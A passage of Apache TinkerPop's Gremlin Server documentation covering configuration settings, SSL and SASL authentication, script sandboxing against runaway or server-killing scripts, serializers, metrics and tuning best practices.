`ScriptEngine`. This pool represents the workers available to handle blocking operations in Gremlin Server. |8\n|host |The name of the host to bind the server to. |localhost\n|useEpollEventLoop |try to use epoll event loops (works only on Linux os) instead of netty NIO. |false\n|maxAccumulationBufferComponents |Maximum number of request components that can be aggregated for a message. |1024\n|maxChunkSize |The maximum length of the content or each chunk. If the content length exceeds this value, the transfer encoding of the decoded request will be converted to 'chunked' and the content will be split into multiple `HttpContent` objects. If the transfer encoding of the HTTP request is 'chunked' already, each chunk will be split into smaller chunks if the length of the chunk exceeds this value. |8192\n|maxContentLength |The maximum length of the aggregated content for a message. Works in concert with `maxChunkSize` where chunked requests are accumulated back into a single message. A request exceeding this size will return a `413 - Request Entity Too Large` status code. A response exceeding this size will raise an internal exception. |65536\n|maxHeaderSize |The maximum length of all headers. |8192\n|maxInitialLineLength |The maximum length of the initial line (e.g. \"GET \/ HTTP\/1.0\") processed in a request, which essentially controls the maximum length of the submitted URI. |4096\n|metrics.consoleReporter.enabled |Turns on console reporting of metrics. |false\n|metrics.consoleReporter.interval |Time in milliseconds between reports of metrics to console. |180000\n|metrics.csvReporter.enabled |Turns on CSV reporting of metrics. |false\n|metrics.csvReporter.fileName |The file to write metrics to. |_none_\n|metrics.csvReporter.interval |Time in milliseconds between reports of metrics to file. |180000\n|metrics.gangliaReporter.addressingMode |Set to `MULTICAST` or `UNICAST`. |_none_\n|metrics.gangliaReporter.enabled |Turns on Ganglia reporting of metrics. |false\n|metrics.gangliaReporter.host |Define the Ganglia host to report Metrics to. |localhost\n|metrics.gangliaReporter.interval |Time in milliseconds between reports of metrics for Ganglia. |180000\n|metrics.gangliaReporter.port |Define the Ganglia port to report Metrics to. |8649\n|metrics.graphiteReporter.enabled |Turns on Graphite reporting of metrics. |false\n|metrics.graphiteReporter.host |Define the Graphite host to report Metrics to. |localhost\n|metrics.graphiteReporter.interval |Time in milliseconds between reports of metrics for Graphite. |180000\n|metrics.graphiteReporter.port |Define the Graphite port to report Metrics to. |2003\n|metrics.graphiteReporter.prefix |Define a \"prefix\" to append to metrics keys reported to Graphite. |_none_\n|metrics.jmxReporter.enabled |Turns on JMX reporting of metrics. |false\n|metrics.slf4jReporter.enabled |Turns on SLF4j reporting of metrics. |false\n|metrics.slf4jReporter.interval |Time in milliseconds between reports of metrics to SLF4j. |180000\n|plugins |A list of plugins that should be activated on server startup in the available script engines. It assumes that the plugins are in Gremlin Server's classpath. |_none_\n|port |The port to bind the server to. |8182\n|processors |A `List` of `Map` settings, where each `Map` represents a `OpProcessor` implementation to use along with its configuration. |_none_\n|processors[X].className |The full class name of the `OpProcessor` implementation. |_none_\n|processors[X].config |A `Map` containing `OpProcessor` specific configurations. |_none_\n|resultIterationBatchSize |Defines the size in which the result of a request is \"batched\" back to the client. In other words, if set to `1`, then a result that had ten items in it would get each result sent back individually. If set to `2` the same ten results would come back in five batches of two each. |64\n|scriptEngines |A `Map` of `ScriptEngine` implementations to expose through Gremlin Server, where the key is the name given by the `ScriptEngine` implementation. The key must match the name exactly for the `ScriptEngine` to be constructed. The value paired with this key is itself a `Map` of configuration for that `ScriptEngine`. |_none_\n|scriptEngines.<name>.imports |A comma separated list of classes\/packages to make available to the `ScriptEngine`. |_none_\n|scriptEngines.<name>.staticImports |A comma separated list of \"static\" imports to make available to the `ScriptEngine`. |_none_\n|scriptEngines.<name>.scripts |A comma separated list of script files to execute on `ScriptEngine` initialization. `Graph` and `TraversalSource` instance references produced from scripts will be stored globally in Gremlin Server, therefore it is possible to use initialization scripts to add Traversal Strategies or create entirely new `Graph` instances all together. Instantiating a `LifeCycleHook` in a script provides a way to execute scripts when Gremlin Server starts and stops.|_none_\n|scriptEngines.<name>.config |A `Map` of configuration settings for the `ScriptEngine`. These settings are dependent on the `ScriptEngine` implementation being used. |_none_\n|scriptEvaluationTimeout |The amount of time in milliseconds before a script evaluation times out. The notion of \"script evaluation\" refers to the time it takes for the `ScriptEngine` to do its work and *not* any additional time it takes for the result of the evaluation to be iterated and serialized. This feature can be turned off by setting the value to `0`. |30000\n|serializers |A `List` of `Map` settings, where each `Map` represents a `MessageSerializer` implementation to use along with its configuration. |_none_\n|serializers[X].className |The full class name of the `MessageSerializer` implementation. |_none_\n|serializers[X].config |A `Map` containing `MessageSerializer` specific configurations. |_none_\n|serializedResponseTimeout |The amount of time in milliseconds before a response serialization times out. The notion of \"response serialization\" refers to the time it takes for Gremlin Server to iterate an entire result after the script is evaluated in the `ScriptEngine`. |30000\n|ssl.enabled |Determines if SSL is turned on or not. |false\n|ssl.keyCertChainFile |The X.509 certificate chain file in PEM format. If this value is not present and `ssl.enabled` is `true` a self-signed certificate will be used (not suitable for production). |_none_\n|ssl.keyFile |The `PKCS#8` private key file in PEM format. If this value is not present and `ssl.enabled` is `true` a self-signed certificate will be used (not suitable for production). |_none_\n|ssl.keyPassword |The password of the `keyFile` if it's not password-protected |_none_\n|ssl.trustCertChainFile |Trusted certificates for verifying the remote endpoint's certificate. The file should contain an X.509 certificate chain in PEM format. A system default will be used if this setting is not present. |_none_\n|strictTransactionManagement |Set to `true` to require `aliases` to be submitted on every requests, where the `aliases` become the scope of transaction management. |false\n|threadPoolBoss |The number of threads available to Gremlin Server for accepting connections. Should always be set to `1`. |1\n|threadPoolWorker |The number of threads available to Gremlin Server for processing non-blocking reads and writes. |1\n|writeBufferHighWaterMark | If the number of bytes in the network send buffer exceeds this value then the channel is no longer writeable, accepting no additional writes until buffer is drained and the `writeBufferLowWaterMark` is met. |65536\n|writeBufferLowWaterMark | Once the number of bytes queued in the network send buffer exceeds the `writeBufferHighWaterMark`, the channel will not become writeable again until the buffer is drained and it drops below this value. |65536\n|=========================================================\n\nNOTE: Configuration of link:http:\/\/ganglia.sourceforge.net\/[Ganglia] requires an additional library that is not\npackaged with Gremlin Server due to its LGPL licensing that conflicts with the TinkerPop's Apache 2.0 License. To\nrun Gremlin Server with Ganglia monitoring, download the `org.acplt:oncrpc` jar from\nlink:http:\/\/repo1.maven.org\/maven2\/org\/acplt\/oncrpc\/1.0.7\/[here] and copy it to the Gremlin Server `\/lib` directory\nbefore starting the server.\n\nSecurity\n^^^^^^^^\n\nimage:gremlin-server-secure.png[width=175,float=right] Gremlin Server provides for several features that aid in the\nsecurity of the graphs that it exposes. It has built in SSL support and a pluggable authentication framework using\nlink:https:\/\/en.wikipedia.org\/wiki\/Simple_Authentication_and_Security_Layer[SASL] (Simple Authentication and\nSecurity Layer). SSL options are described in the configuration settings table above, so this section will focus on\nauthentication.\n\nBy default, Gremlin Server is configured to allow all requests to be processed (i.e. no authentication). To enable\nauthentication, Gremlin Server must be configured with an `Authenticator` implementation in its YAML file. Gremlin\nServer comes packaged with an implementation called `SimpleAuthenticator`. The `SimpleAuthenticator` implements the\n`PLAIN` SASL mechanism (i.e. plain text) to authenticate a request. It validates username\/password pairs against a\ngraph database, which must be provided to it as part of the configuration.\n\n[source,yaml]\nauthentication: {\n className: org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator,\n config: {\n credentialsDb: conf\/tinkergraph-credentials.properties}}\n\nQuick Start\n+++++++++++\n\nA quick way to get started with the `SimpleAuthenticator` is to use TinkerGraph for the \"credentials graph\" and the\n\"sample\" credential graph that is packaged with the server.\n\n[source,text]\n----\n$ bin\/gremlin-server.sh conf\/gremlin-server-secure.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-secure.yaml\n...\n[WARN] AbstractChannelizer - Enabling SSL with self-signed certificate (NOT SUITABLE FOR PRODUCTION)\n[INFO] AbstractChannelizer - SSL enabled\n[INFO] SimpleAuthenticator - Initializing authentication with the org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator\n[INFO] SimpleAuthenticator - CredentialGraph initialized at CredentialGraph{graph=tinkergraph[vertices:1 edges:0]}\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nIn addition to configuring the authenticator, `gremlin-server-secure.yaml` also enables SSL with a self-signed\ncertificate. As SSL is enabled on the server it must also be enabled on the client when connecting. To connect to\nGremlin Server with `gremlin-driver`, set the `credentials` and `enableSsl` when constructing the `Cluster`.\n\n[source,java]\nCluster cluster = Cluster.build().credentials(\"stephen\", \"password\")\n .enableSsl(true).create();\n\nIf connecting with Gremlin Console, which utilizes `gremlin-driver` for remote script execution, use the provided\n`conf\/remote-secure.yaml` file when defining the remote. That file contains configuration for the username and\npassword as well as enablement of SSL from the client side.\n\nSimilarly, Gremlin Server can be configured for REST and security.\n\n[source,text]\n----\n$ bin\/gremlin-server.sh conf\/gremlin-server-rest-secure.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-secure.yaml\n...\n[WARN] AbstractChannelizer - Enabling SSL with self-signed certificate (NOT SUITABLE FOR PRODUCTION)\n[INFO] AbstractChannelizer - SSL enabled\n[INFO] SimpleAuthenticator - Initializing authentication with the org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator\n[INFO] SimpleAuthenticator - CredentialGraph initialized at CredentialGraph{graph=tinkergraph[vertices:1 edges:0]}\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nOnce the server has started, issue a request passing the credentials with an `Authentication` header, as described in link:http:\/\/tools.ietf.org\/html\/rfc2617#section-2[RFC2617]. Here's a HTTP Basic authentication example with cURL:\n\n[source,text]\ncurl -X POST --insecure -u stephen:password -d \"{\\\"gremlin\\\":\\\"100-1\\\"}\" \"https:\/\/localhost:8182\"\n\n[[credentials-dsl]]\nCredentials Graph DSL\n+++++++++++++++++++++\n\nThe \"credentials graph\", which has been mentioned in previous sections, is used by Gremlin Server to hold the list of\nusers who can authenticate to the server. It is possible to use virtually any `Graph` instance for this task as long\nas it complies to a defined schema. The credentials graph stores users as vertices with the `label` of \"user\". Each\n\"user\" vertex has two properties: `username` and `password`. Naturally, these are both `String` values. The password\nmust not be stored in plain text and should be hashed.\n\nIMPORTANT: Be sure to define an index on the `username` property, as this will be used for lookups. If supported by\nthe `Graph`, consider specifying a unique constraint as well.\n\nTo aid with the management of a credentials graph, Gremlin Server provides a Gremlin Console plugin which can be\nused to add and remove users so as to ensure that the schema is adhered to, thus ensuring compatibility with Gremlin\n Server. In addition, as it is a plugin, it works naturally in the Gremlin Console as an extension of its\n capabilities (though one could use it programmatically, if desired). This plugin is distributed with the Gremlin\n Console so it does not have to be \"installed\". It does however need to be activated:\n\n[source,groovy]\ngremlin> :plugin use tinkerpop.credentials\n==>tinkerpop.credentials activated\n\nPlease see the example usage as follows:\n\n[gremlin-groovy]\n----\ngraph = TinkerGraph.open()\ngraph.createIndex(\"username\",Vertex.class)\ncredentials = credentials(graph)\ncredentials.createUser(\"stephen\",\"password\")\ncredentials.createUser(\"daniel\",\"better-password\")\ncredentials.createUser(\"marko\",\"rainbow-dash\")\ncredentials.findUser(\"marko\").properties()\ncredentials.countUsers()\ncredentials.removeUser(\"daniel\")\ncredentials.countUsers()\n----\n\n[[script-execution]]\nScript Execution\n++++++++++++++++\n\nIt is important to remember that Gremlin Server exposes a `ScriptEngine` instance that allows for remote execution\nof arbitrary code on the server. Obviously, this situation can represent a security risk or, more minimally, provide\nways for \"bad\" scripts to be inadvertently executed. A simple example of a \"valid\" Gremlin script that would cause\nsome problems would be, `while(true) {}`, which would consume a thread in the Gremlin pool indefinitely, thus\npreventing it from serving other requests. Sending enough of these kinds of scripts would eventually consume all\navailable threads and Gremlin Server would stop responding.\n\nGremlin Server (more specifically the `GremlinGroovyScriptEngine`) provides methods to protect itself from these\nkinds of troublesome scripts. A user can configure the script engine with different `CompilerCustomizerProvider`\nimplementations. Consider the basic configuration from the Gremlin Server YAML file:\n\n[source,yaml]\nscriptEngines: {\n gremlin-groovy: {\n imports: [java.lang.Math],\n staticImports: [java.lang.Math.PI],\n scripts: [scripts\/empty-sample.groovy]}}\n\nThis configuration can be extended to include a `config` key as follows:\n\n[source,yaml]\nscriptEngines: {\n gremlin-groovy: {\n imports: [java.lang.Math],\n staticImports: [java.lang.Math.PI],\n scripts: [scripts\/empty-sample.groovy],\n config: {\n compilerCustomizerProviders: {\n \"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.TimedInterruptCustomizerProvider\":[10000] }}}\n\nThis configuration sets up the script engine with a `CompilerCustomizerProvider` implementation. The\n`TimedInterruptCustomizerProvider` injects checks that ensure that loops (like `while`) can only execute for `10000`\nmilliseconds. With this configuration in place, a remote execution as follows, now times out rather than consuming\nthe thread continuously:\n\n[source,groovy]\ngremlin> :remote connect tinkerpop.server conf\/remote.yaml\n==>Configured localhost\/127.0.0.1:8182\ngremlin> :> while(true) { }\nExecution timed out after 10000 units. Start time: Fri Jul 24 11:04:52 EDT 2015\n\nThere are a number of pre-packaged `CustomizerProvider` implementations:\n\n[width=\"100%\",cols=\"3,10a\",options=\"header\"]\n|=========================================================\n|Customizer |Description\n|`CompileStaticCustomizerProvider` |Applies `CompileStatic` annotations to incoming scripts thus removing dynamic dispatch. More information about static compilation can be found in the link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#_static_compilation[Groovy Documentation]. It is possible to configure this `CustomizerProvider` by specifying a comma separated list of link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#Typecheckingextensions-Workingwithextensions[type checking extensions] that can have the effect of securing calls to various methods.\n|`ThreadInterruptCustomizerProvider` |Injects checks for thread interruption, thus allowing the thread to potentially respect calls to `Thread.interrupt()`\n|`TimedInterruptCustomizerProvider` |Injects checks into loops to interrupt them if they exceed the configured timeout in milliseconds.\n|`TypeCheckedCustomizerProvider` |Similar to the above mentioned, `CompileStaticCustomizerProvider`, the `TypeCheckedCustomizerProvider` injects `TypeChecked` annotations to incoming scripts. More information on the nature of this annotation can be found in the link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#_the_code_typechecked_code_annotation[Groovy Documentation]. It too takes a comma separated list of link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#Typecheckingextensions-Workingwithextensions[type checking extensions].\n|=========================================================\n\nTo provide some basic out-of-the-box protections against troublesome scripts, the following configuration can be used:\n\n[source,yaml]\nscriptEngines: {\n gremlin-groovy: {\n imports: [java.lang.Math],\n staticImports: [java.lang.Math.PI],\n scripts: [scripts\/empty-sample.groovy],\n config: {\n compilerCustomizerProviders: {\n \"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.ThreadInterruptCustomizerProvider\":[],\n \"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.TimedInterruptCustomizerProvider\":[10000],\n \"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.CompileStaticCustomizerProvider\":[\"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.SimpleSandboxExtension\"]}}}}\n\nNOTE: The above configuration could also use the `TypeCheckedCustomizerProvider` in place of the\n`CompileStaticCustomizerProvider`. The differences between `TypeChecked` and `CompileStatic` are beyond the scope of\nthis documentation. Consult the latest link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#_typing[Groovy Documentation]\nfor information on the differences. It is important to understand the impact that these configuration will have on\nsubmitted scripts before enabling this feature.\n\nNOTE: The import of classes to the script engine is handled by the `ImportCustomizerProvider`. As the concept of\n\"imports\" is a first-class citizen (i.e. has its own configuration options), it is not recommended that the\n`ImportCustomizerProvider` be used as a configuration option to `compilerCustomizerProviders`.\n\nThis configuration uses the `SimpleSandboxExtension`, which blacklists calls to methods on the `System` class,\nthereby preventing someone from remotely killing the server:\n\n[source,groovy]\n----\ngremlin> :> System.exit(0)\nScript8.groovy: 1: [Static type checking] - Not authorized to call this method: java.lang.System#exit(int)\n @ line 1, column 1.\n System.exit(0)\n ^\n\n1 error\n----\n\nThe `SimpleSandboxExtension` is by no means a \"complete\" implementation protecting against all manner of nefarious\nscripts, but it does provide an example for how such a capability might be implemented. A more complete implementation\nis offered in the `FileSandboxExtension` which uses a configuration file to white list certain classes and methods.\nThe configuration file is YAML-based and an example is presented as follows:\n\n[source,yaml]\n----\nautoTypeUnknown: true\nmethodWhiteList:\n - java\\.lang\\.Boolean.*\n - java\\.lang\\.Byte.*\n - java\\.lang\\.Character.*\n - java\\.lang\\.Double.*\n - java\\.lang\\.Enum.*\n - java\\.lang\\.Float.*\n - java\\.lang\\.Integer.*\n - java\\.lang\\.Long.*\n - java\\.lang\\.Math.*\n - java\\.lang\\.Number.*\n - java\\.lang\\.Object.*\n - java\\.lang\\.Short.*\n - java\\.lang\\.String.*\n - java\\.lang\\.StringBuffer.*\n - java\\.lang\\.System#currentTimeMillis\\(\\)\n - java\\.lang\\.System#nanoTime\\(\\)\n - java\\.lang\\.Throwable.*\n - java\\.lang\\.Void.*\n - java\\.util\\..*\n - org\\.codehaus\\.groovy\\.runtime\\.DefaultGroovyMethods.*\n - org\\.codehaus\\.groovy\\.runtime\\.InvokerHelper#runScript\\(java\\.lang\\.Class,java\\.lang\\.String\\[\\]\\)\n - org\\.codehaus\\.groovy\\.runtime\\.StringGroovyMethods.*\n - groovy\\.lang\\.Script#<init>\\(groovy.lang.Binding\\)\n - org\\.apache\\.tinkerpop\\.gremlin\\.structure\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\.bulkloading\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\.clustering\\.peerpressure\\.*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\.ranking\\.pagerank\\.*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\.traversal\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.traversal\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.traversal\\.dsl\\.graph\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.traversal\\.engine\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.server\\.util\\.LifeCycleHook.*\nstaticVariableTypes:\n graph: org.apache.tinkerpop.gremlin.structure.Graph\n g: org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.GraphTraversalSource\n----\n\nThere are three keys in this configuration file that control different aspects of the sandbox:\n\n. `autoTypeUnknown` - When set to `true`, unresolved variables are typed as `Object`.\n. `methodWhiteList` - A white list of classes and methods that follow a regex pattern which can then be matched against\nmethod descriptors to determine if they can be executed. The method descriptor is the fully-qualified class name\nof the method, its name and parameters. For example, `Math.ceil` would have a descriptor of\n`java.lang.Math#ceil(double)`.\n. `staticVariableTypes` - A list of variables that will be used in the `ScriptEngine` for which the types are\nalways known. In the above example, the variable \"graph\" will always be bound to a `Graph` instance.\n\nAt Gremlin Server startup, the `FileSandboxExtension` looks in the root of Gremlin Server installation directory for a\nfile called `sandbox.yaml` and configures itself. To use a file in a different location set the\n`gremlinServerSandbox` system property to the location of the file (e.g. `-DgremlinServerSandbox=conf\/my-sandbox.yaml`).\n\nThe `FileSandboxExtension` provides for a basic configurable security function in Gremlin Server. More complex\nsandboxing implementations can be developed by using this white listing model and extending from the\n`AbstractSandboxExtension`.\n\nA final thought on the topic of `CompilerCustomizerProvider` implementations is that they are not just for\n\"security\" (though they are demonstrated in that capacity here). They can be used for a variety of features that\ncan fine tune the Groovy compilation process. Read more about compilation customization in the\nlink:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#compilation-customizers[Groovy Documentation].\n\nSerialization\n^^^^^^^^^^^^^\n\nGremlin Server can accept requests and return results using different serialization formats. The format of the\nserialization is configured by the `serializers` setting described in the table above. Note that some serializers\nhave additional configuration options as defined by the `serializers[X].config` setting. The `config` setting is a\n`Map` where the keys and values get passed to the serializer at its initialization. The available and\/or expected\nkeys are dependent on the serializer being used. Gremlin Server comes packaged with two different serializers:\nGraphSON and Gryo.\n\nGraphSON\n++++++++\n\nThe GraphSON serializer produces human readable output in JSON format and is a good configuration choice for those\ntrying to use TinkerPop from non-JVM languages. JSON obviously has wide support across virtually all major\nprogramming languages and can be consumed by a wide variety of tools.\n\n[source,yaml]\n - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0 }\n\nThe above configuration represents the default serialization under the `application\/json` MIME type and produces JSON\nconsistent with standard JSON data types. It has the following configuration option:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plugin any custom serializers that are tied to it. |_none_\n|=========================================================\n\n[source,yaml]\n - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0 }\n\nWhen the standard JSON data types are not enough (e.g. need to identify the difference between `double` and `float`\ndata types), the above configuration will embed types into the JSON itself. The type embedding uses standard Java\ntype names, so interpretation from non-JVM languages will be required. It has the MIME type of\n`application\/vnd.gremlin-v1.0+json` and the following configuration options:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plugin any custom serializers that are tied to it. |_none_\n|=========================================================\n\nGryo\n++++\n\nThe Gryo serializer utilizes Kryo-based serialization which produces a binary output. This format is best consumed\nby JVM-based languages.\n\n[source,yaml]\n - { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerGremlinV1d0 }\n\nIt has the MIME type of `application\/vnd.gremlin-v1.0+gryo` and the following configuration options:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|bufferSize |The maximum size of the Kryo buffer for use on a single object being serialized. Increasing this value will correct `KryoException` errors that complain of \"Buffer too small\". |_4096_\n|classResolverSupplier |The fully qualified classname of a custom `Supplier<ClassResolver>` which will be used when constructing `Kryo` instances. There is no direct default for this setting, but without a setting the `GryoClassResolver` is used. |_none_\n|custom |A list of classes with custom kryo `Serializer` implementations related to them in the form of `<class>;<serializer-class>`. |_none_\n|ioRegistries |A list of `IoRegistry` implementations to be applied to the serializer. |_none_\n|serializeResultToString |When set to `true`, results are serialized by first calling `toString()` on each object in the result list resulting in an extended MIME Type of `application\/vnd.gremlin-v1.0+gryo-stringd`. When set to `false` Kryo-based serialization is applied. |_false_\n|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plugin any custom serializers that are tied to it. |_none_\n|=========================================================\n\nAs described above, there are multiple ways in which to register serializers for Kryo-based serialization. These\nconfigurations can be used in conjunction with one another where there is a specific ordering to how the configurations\nare applied. The `userMapperFromGraph` setting is applied first, followed by any `ioRegistries` and finalized by the\n`custom` setting.\n\nThose configuring or implementing a `Supplier<ClassResolver>` should consider this an \"advanced\" option and typically\nimportant to use cases where server types need to be coerced to client types (i.e. a type is available on the server\nbut not on the client). Implementations should typically instantiate `ClassResolver` implementations that are\nextensions of the `GryoClassResolver` as this class is important to most serialization tasks in TinkerPop.\n\nMetrics\n^^^^^^^\n\nGremlin Server produces metrics about its operations that can yield some insight into how it is performing. These\nmetrics are exposed in a variety of ways:\n\n* Directly to the console where Gremlin Server is running\n* CSV file\n* link:http:\/\/ganglia.info\/[Ganglia]\n* link:http:\/\/graphite.wikidot.com\/[Graphite]\n* link:http:\/\/www.slf4j.org\/[SLF4j]\n* link:https:\/\/en.wikipedia.org\/wiki\/Java_Management_Extensions[JMX]\n\nThe configuration of each of these outputs is described in the Gremlin Server <<_configuring_2, Configuring>> section.\nRegardless of the output, the metrics gathered are the same. Each metric is prefixed with\n`org.apache.tinkerpop.gremlin.server.GremlinServer` and the following metrics are reported:\n\n* `sessions` - the number of sessions open at the time the metric was last measured.\n* `errors` - the number of total errors, mean rate, as well as the 1, 5, and 15-minute error rates.\n* `op.eval` - the number of script evaluations, mean rate, 1, 5, and 15 minute rates, minimum, maximum, median, mean,\nand standard deviation evaluation times, as well as the 75th, 95th, 98th, 99th and 99.9th percentile evaluation times\n(note that these time apply to both sessionless and in-session requests).\n\nBest Practices\n~~~~~~~~~~~~~~\n\nThe following sections define best practices for working with Gremlin Server.\n\nTuning\n^^^^^^\n\nimage:gremlin-handdrawn.png[width=120,float=right] Tuning Gremlin Server for a particular environment may require some simple trial-and-error, but the following represent some basic guidelines that might be useful:\n\n* Gremlin Server defaults to a very modest maximum heap size. Consider increasing this value for non-trivial uses. Maximum heap size (`-Xmx`) is defined with the `JAVA_OPTIONS` setting in `gremlin-server.sh`.\n* When configuring the size of `threadPoolWorker` start with the default of `1` and increment by one as needed to a maximum of `2*number of cores`.\n* The \"right\" size of the `gremlinPool` setting is somewhat dependent on the type of scripts that will be processed\nby Gremlin Server. As requests arrive to Gremlin Server they are decoded and queued to be processed by threads in\nthis pool. When this pool is exhausted of threads, Gremlin Server will continue to accept incoming requests, but\nthe queue will continue to grow. If left to grow too large, the server will begin to slow. When tuning around\nthis setting, consider whether the bulk of the scripts being processed will be \"fast\" or \"slow\", where \"fast\"\ngenerally means being measured in the low hundreds of milliseconds and \"slow\" means anything longer than that.\n** If the bulk of the scripts being processed are expected to be \"fast\", then a good starting point for this setting is `2*threadPoolWorker`.\n** If the bulk of the scripts being processed are expected to be \"slow\", then a good starting point for this setting is `4*threadPoolWorker`.\n* Scripts that are \"slow\" can really hurt Gremlin Server if they are not properly accounted for. `ScriptEngine`\nevaluations are blocking operations that aren't easily interrupted, so once a \"slow\" script is being evaluated in\nthe context of a `ScriptEngine` it must finish its work. Lots of \"slow\" scripts will eventually consume the\n`gremlinPool` preventing other scripts from getting processed from the queue.\n** To limit the impact of this problem consider properly setting the `scriptEvaluationTimeout` and the `serializedResponseTimeout` to something \"sane\".\n** Test the traversals being sent to Gremlin Server and determine the maximum time they take to evaluate and iterate\nover results, then set these configurations accordingly.\n** Note that `scriptEvaluationTimeout` does not interrupt the evaluation on timeout. It merely allows Gremlin Server\nto \"ignore\" the result of that evaluation, which means the thread in the `gremlinPool` will still be consumed after\nthe timeout.\n** The `serializedResponseTimeout` will kill the result iteration process and prevent additional processing. In most\nsituations, the iteration and serialization process is the more costly step in this process as an errant script that\nreturns a million or more results could send Gremlin Server into a long streaming cycle. Script evaluation on the\nother hand is usually very fast, occurring on the order of milliseconds, but that is entirely dependent on the\ncontents of the script itself.\n\n[[parameterized-scripts]]\nParameterized Scripts\n^^^^^^^^^^^^^^^^^^^^^\n\nimage:gremlin-parameterized.png[width=150,float=left] Use script parameterization. Period. Gremlin Server caches\nall scripts that are passed to it. The cache is keyed based on the a hash of the script. Therefore `g.V(1)` and\n`g.V(2)` will be recognized as two separate scripts in the cache. If that script is parameterized to `g.V(x)`\nwhere `x` is passed as a parameter from the client, there will be no additional compilation cost for future requests\non that script. Compilation of a script should be considered \"expensive\" and avoided when possible.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\n\nMap<String,Object> params = new HashMap<>();\nparams.put(\"x\",4);\nclient.submit(\"[1,2,3,x]\", params);\n----\n\nCache Management\n^^^^^^^^^^^^^^^^\n\nIf Gremlin Server processes a large number of unique scripts, the global function cache will grow beyond the memory\navailable to Gremlin Server and an `OutOfMemoryError` will loom. Script parameterization goes a long way to solving\nthis problem and running out of memory should not be an issue for those cases. If it is a problem or if there is no\nscript parameterization due to a given use case (perhaps using with use of <<sessions,sessions>>), it is possible to\nbetter control the nature of the global function cache from the client side, by issuing scripts with a parameter to\nhelp define how the garbage collector should treat the references.\n\nThe parameter is called `#jsr223.groovy.engine.keep.globals` and has four options:\n\n* `hard` - available in the cache for the life of the JVM (default when not specified).\n* `soft` - retained until memory is \"low\" and should be reclaimed before an `OutOfMemoryError` is thrown.\n* `weak` - garbage collected even when memory is abundant.\n* `phantom` - removed immediately after being evaluated by the `ScriptEngine`.\n\nBy specifying an option other than `hard`, an `OutOfMemoryError` in Gremlin Server should be avoided. Of course,\nthis approach will come with the downside that functions could be garbage collected and thus removed from the\ncache, forcing Gremlin Server to recompile later if that script is later encountered.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\n\nMap<String,Object> params = new HashMap<>();\nparams.put(\"x\",4);\nparams.put(\"#jsr223.groovy.engine.keep.globals\", \"soft\");\nclient.submit(\"[1,2,3,x]\", params);\n----\n\n[[sessions]]\nConsidering Sessions\n^^^^^^^^^^^^^^^^^^^^\n\nThe preferred approach for issuing requests to Gremlin Server is to do so in a sessionless manner. The concept of\n\"sessionless\" refers to a request that is completely encapsulated within a single transaction, such that the script\nin the request starts with a new transaction and ends with a closed transaction. Sessionless requests have automatic\ntransaction management handled by Gremlin Server, thus automatically opening and closing transactions as previously\ndescribed. The downside to the sessionless approach is that the entire script to be executed must be known at the\ntime of submission so that it can all be executed at once. This requirement makes it difficult for some use cases\nwhere more control over the transaction is desired.\n\nFor such use cases, Gremlin Server supports sessions. With sessions, the user is in complete control of the start\nand end of the transaction. This feature comes with some additional expense to consider:\n\n* Initialization scripts will be executed for each session created so any expense related to them will be established\neach time a session is constructed.\n* There will be one script cache per session, which obviously increases memory requirements. The cache is not shared,\nso as to ensure that a session has isolation from other session environments. As a result, if the same script is\nexecuted in each session the same compilation cost will be paid for each session it is executed in.\n* Each session will require its own thread pool with a single thread in it - this ensures that transactional\nboundaries are managed properly from one request to the next.\n* If there are multiple Gremlin Server instances, communication from the client to the server must be bound 